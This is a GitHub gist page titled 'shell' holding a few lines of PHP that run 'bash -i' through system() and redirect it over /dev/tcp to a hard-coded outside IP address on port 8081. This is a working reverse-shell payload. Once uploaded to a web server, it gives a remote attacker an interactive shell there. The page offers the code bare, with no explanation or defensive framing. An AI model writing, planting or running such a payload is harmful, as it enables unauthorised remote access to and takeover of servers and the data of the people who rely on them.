Skip to content

Instantly share code, notes, and snippets.

@NitescuLucian
Created January 19, 2019 14:10
Show Gist options
  • Save NitescuLucian/3371d4368a55972d9901871b9202e545 to your computer and use it in GitHub Desktop.
Save NitescuLucian/3371d4368a55972d9901871b9202e545 to your computer and use it in GitHub Desktop.
shell
<?php
$a = system("bash -i >& /dev/tcp/45.32.187.31/8081 0>&1");
echo $a;
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment